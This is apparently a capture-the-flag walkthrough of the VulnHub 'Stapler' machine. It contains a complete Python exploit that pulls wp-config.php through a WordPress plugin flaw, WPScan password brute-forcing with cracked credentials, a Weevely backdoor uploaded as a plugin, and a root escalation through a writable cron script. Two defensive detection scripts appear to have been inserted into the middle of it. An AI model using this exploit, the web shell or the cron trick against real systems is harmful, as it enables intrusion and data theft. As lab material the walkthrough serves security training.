CTF Walkthroughs, VulnHub

VulnHub – Stapler: 1 Walkthrough

Introduction

This was an easy Linux machine that involved exploiting a WordPress plugin to gain access to the wp-config.php file which contained database credentials and uploading a malicious plugin into WordPress to gain remote access. Privilege escalation was then possible by exploiting a clear-text password left in the BASH history or an insecure cron job.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions
  • -oA to save the output in all available formats

The scan has revealed ports 21, 22, 53, 80, 139, 666 and 3306 open, so the next logical step is to start enumerating HTTP, FTP, SMB and MySQL.

A subsequent Nmap scan using the -p- flag to scan all ports reveals an additional port, 12380:

Enumerating FTP

It appears anonymous authentication is enabled on the box:

The note contains the following:

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

For the time being it would be best not to spend more time investigating this service…

Enumerating SMB

Using the smbclient tool to enumerate open shares:

When running the enum4linux tool against the target machine, it identified a number of users:


 ===================================================================== 
|    Users on 10.0.0.101 via RID cycling (RIDS: 500-550,1000-1050)    |
 ===================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

These could be used later on for a brute-forcing attack.

Enumerating DNS

Using the nslookup tool to identify any domain name records:

Performing a DNS zone transfer to identify potential domain names:

Both of these tests were unsuccessful unfortunately.

Enumerating Doom

When connecting to the Doom service on port 666, it returns mangled data:

When redirecting the data to a file and inspecting it with the file command, it appears to be a ZIP archive. Unzipping the archive:

The archive contained an image showing a segmentation fault error, which could indicate a buffer overflow vulnerability:

When using the strings command against the image, an interesting message is revealed:

Enumerating HTTP

When navigating to port 80 on a browser, the following page comes up:

The following site is hosted on port 12380, which looks a little more interesting:

When performing a Nikto scan against the target, it found an /admin112233, a /blogblog and a /phpmyadmin entry:

The /admin112233 entry seems to just display a JavaScript alert, so it won't be useful at this point in time:

The /phpmyadmin entry leads to a phpMyAdmin login screen, which could be useful later on to retrieve credentials:

The /blogblog entry leads to a blog:

When looking at the source code, it appears that the blog is powered by WordPress:

Enumerating WordPress

When running WPScan against the target machine with the following flags, a few users are found:

  • --url to specify the URL of the WordPress application, in this case http://10.0.0.101:12380/blogblog/
  • --enumerate to specify the elements to enumerate, in this case u for users
  • --disable-tls-checks to ignore self-signed or otherwise untrusted SSL/TLS certificates
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://10.0.0.101:12380/blogblog/ [10.0.0.101]
[+] Started: Sat May 16 13:25:13 2020

[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Using WPScan again to perform a brute-force attack with the following flags:

  • --disable-tls-checks to ignore self-signed or otherwise untrusted SSL/TLS certificates
  • -P to specify the wordlist to be used for the brute-force attack, in this case the top 1000 passwords list
  • -o to specify the file to output the results of the scan to
  • -t to specify the number of threads, in this case 50
  • --url to specify the URL of the WordPress application, in this case http://10.0.0.101:12380/blogblog/
[+] URL: https://10.0.0.101:12380/blogblog/ [10.0.0.101]
[+] Started: Sat May 16 14:09:13 2020
[!] Valid Combinations Found:
| Username: garry, Password: football
| Username: harry, Password: monkey
| Username: scott, Password: cookie
| Username: tim, Password: thumb

The scan has found valid credentials for a few of the users identified earlier.

After logging in with each one of them, none of them seemed to have WordPress admin access, so this looks like a dead end:

Brute-forcing SSH and FTP credentials with these users was also attempted, to no avail.

Using WPScan with the following flags to enumerate plugins on the WordPress site:

  • --disable-tls-checks to ignore self-signed or otherwise untrusted SSL/TLS certificates
  • --enumerate to specify the elements to enumerate, in this case ap for all plugins
  • --plugins-detection to specify the mode to use when attempting to enumerate plugins, in this case aggressive
  • --url to specify the URL of the WordPress application, in this case http://10.0.0.101:12380/blogblog
  • -o to specify the file to output the results of the scan to

The scan has identified quite a few plugins:

[+] URL: https://10.0.0.101:12380/blogblog/ [10.0.0.101]
[+] Started: Sat May 16 14:27:39 2020

[i] Plugin(s) Identified:

[+] advanced-video-embed-embed-videos-or-playlists
 | Location: https://10.0.0.101:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://10.0.0.101:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[+] akismet
 | Location: https://10.0.0.101:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 4.1.5
 | Last Updated: 2020-04-29T13:02:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] shortcode-ui
 | Location: https://10.0.0.101:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://10.0.0.101:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [!] The version is out of date, the latest version is 0.7.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[+] two-factor
 | Location: https://10.0.0.101:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.6.0
 | Last Updated: 2020-05-06T19:56:00.000Z
 | Readme: https://10.0.0.101:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

Using SearchSploit to look for known vulnerabilities in each of the discovered plugins:

It appears the Advanced Video plugin is affected by a local file inclusion vulnerability.

Exploiting the File Inclusion Vulnerability

This plugin allows us to download the content of the

Looking at the exploit, the ave_publishPost function (specifically its thumb parameter) allows attackers to include arbitrary files hosted on the web server. The exploit can be used to retrieve the wp-config.php file, which contains the WordPress configuration as well as the credentials used to access the database.

#!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / WordPress 4.2.2

# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:

#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);


# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default WordPress config)

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
	numbers = re.findall(r'\d+',line)
	id = numbers[-1]
	id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
	if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
		urls=re.findall('"(https?://.*?)"', line)
		print urllib2.urlopen(urls[0]).read()

Running the exploit initially fails because the site uses HTTPS with a certificate that cannot be verified:

Found a solution to this error at this Stack Overflow post, therefore adding the following lines to the exploit:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

After running the exploit, it has now generated an image with the contents of the wp-config.php file.

Using curl to download the image and save it locally:

When viewing the contents of the image file, it contains database credentials:

Used the credentials to successfully log into PHPMyAdmin:
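The fix on the defensive side is that thumb must only ever be fetched as a remote http(s) image URL, never passed straight to file_get_contents(). As an added example (my own code, not part of the walkthrough or the plugin), the following detection logic runs over constructed Apache access-log lines and flags ave_publishPost requests whose thumb value is a local path, a non-http scheme or a loopback host; the log lines and the sample IPs are made up for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format lines (not taken from the original box):
# two path-style thumb values, one legitimate remote image URL, one unrelated hit.
SAMPLE_LOG = """\
10.0.0.50 - - [16/May/2020:14:40:01 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=1234&short=rnd&term=rnd&thumb=../wp-config.php HTTP/1.1" 200 512 "-" "Python-urllib/2.7"
10.0.0.51 - - [16/May/2020:14:41:12 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=video&short=1&term=1&thumb=https://img.example.com/cover.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.52 - - [16/May/2020:14:42:30 +0000] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=x&short=1&term=1&thumb=%2Fetc%2Fpasswd HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.53 - - [16/May/2020:14:43:05 +0000] "GET /blogblog/?p=42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request method and target; the rest of the line is ignored.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def suspicious_thumb(value):
    """A thumb value is only legitimate as a remote http(s) image URL; anything else
    (relative or absolute local path, file://, php://, loopback host) means the
    plugin would read the server's own files through file_get_contents()."""
    try:
        parsed = urlparse(value)
    except ValueError:
        return True
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return True
    return parsed.hostname in ("localhost", "127.0.0.1", "::1")


def scan_access_log(text):
    """Return (ip, timestamp, thumb) for every ave_publishPost request with a suspicious thumb."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        target = urlparse(m.group("target"))
        if not target.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(target.query)           # percent-decodes the values
        if params.get("action", [""])[0] != "ave_publishPost":
            continue
        thumb = params.get("thumb", [""])[0]
        if suspicious_thumb(thumb):
            hits.append((m.group("ip"), m.group("ts"), thumb))
    return hits


if __name__ == "__main__":
    for ip, ts, thumb in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} ave_publishPost thumb={thumb!r}")
```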

Exploiting WordPress Plugin Functionality

Running the following query to obtain information about WordPress admin users:

Using the hashes.org online hash lookup tool to recover the password for the Mike user:

This user appears to have admin access to the WordPress site:

Navigating to Plugins -> Add New:

Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free-hosted ones. Using Weevely to generate a PHP reverse shell, providing a password and the name for the shell:

The backdoor.php file has been successfully uploaded:

Using Weevely to gain a reverse shell, providing the path to the file and the password used earlier:

This has granted a reverse shell as the www-data user.

Privilege Escalation #1

When inspecting the bash history for the JKanode user, it seems to contain SSH credentials for the JKanode and peter users, used with the sshpass tool:

After logging in as JKanode, it appears this user does not have root access:

Changing user to peter using the su command:

It appears this user does have root access, reading the flag:

Privilege Escalation #2

When reviewing cron jobs, it appears a logrotate script is executed by root and is writable by all users:

Modified the file to create a SUID copy of the /bin/dash binary:

The following command can then be used to execute it and gain root access:

/bin/dash -p
# whoami
root
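Both halves of this escalation leave something a host audit can catch: a root-run cron script that non-root users can write, and a set-uid copy of a shell sitting in a world-writable directory. The following audit helper is an added example (my own code, not from the walkthrough); it matches set-uid files against the system shells by content so renaming the copy does not hide it, and demo() builds a constructed fixture in a temporary directory. The cron directory list is an assumption about where root-run jobs live on the target.

```python
import hashlib
import os
import shutil
import stat
import tempfile

CRON_DIRS = ["/etc/cron.d", "/etc/cron.daily", "/etc/cron.hourly", "/etc/cron.weekly", "/etc/cron.monthly"]
SHELLS = ["/bin/sh", "/bin/dash", "/bin/bash"]  # assumed locations of the shells to fingerprint


def _regular_files(roots):
    """Yield (path, mode) for every regular file below the given directories."""
    for root in roots:
        for dirpath, _dirs, names in os.walk(root):
            for name in names:
                path = os.path.join(dirpath, name)
                mode = os.lstat(path).st_mode
                if stat.S_ISREG(mode):
                    yield path, mode


def group_or_world_writable(roots):
    """Files whose mode bits let group or others write them (POSIX ACLs are not checked)."""
    return sorted(p for p, m in _regular_files(roots) if m & (stat.S_IWGRP | stat.S_IWOTH))


def _sha256(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def setuid_shell_copies(roots, shells=SHELLS):
    """Set-uid files whose contents equal a system shell, whatever name they were given."""
    known = {_sha256(s) for s in shells if os.path.isfile(s)}
    return sorted(p for p, m in _regular_files(roots)
                  if m & stat.S_ISUID and _sha256(p) in known)


def demo():
    """Constructed fixture: a world-writable cron script beside a sane one, plus a renamed
    set-uid copy of /bin/sh; returns the findings relative to the temporary tree."""
    base = tempfile.mkdtemp()
    try:
        cron = os.path.join(base, "cron.daily")
        os.mkdir(cron)
        for name, mode in (("logrotate", 0o777), ("safe", 0o755)):
            with open(os.path.join(cron, name), "w") as f: f.write("#!/bin/sh\n")
            os.chmod(os.path.join(cron, name), mode)
        shutil.copyfile("/bin/sh", os.path.join(base, "lr"))   # the renamed shell copy
        os.chmod(os.path.join(base, "lr"), 0o4755)
        found = {"writable": group_or_world_writable([cron]),
                 "suid_shells": setuid_shell_copies([base])}
        return {k: [os.path.relpath(p, base) for p in v] for k, v in found.items()}
    finally:
        shutil.rmtree(base)
```

On a real host, call group_or_world_writable(CRON_DIRS) and setuid_shell_copies on the temporary and home directories; the "safe" 0755 script in the fixture is there to show that correctly permissioned jobs are not reported.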

Conclusion

This was a very interesting box, as it had several ways to gain a foothold and to escalate privileges, exploiting various vulnerabilities and/or misconfigurations. The steps above are not an exhaustive list of the techniques that can be used to gain access but it is only the path I went down as I completed the machine.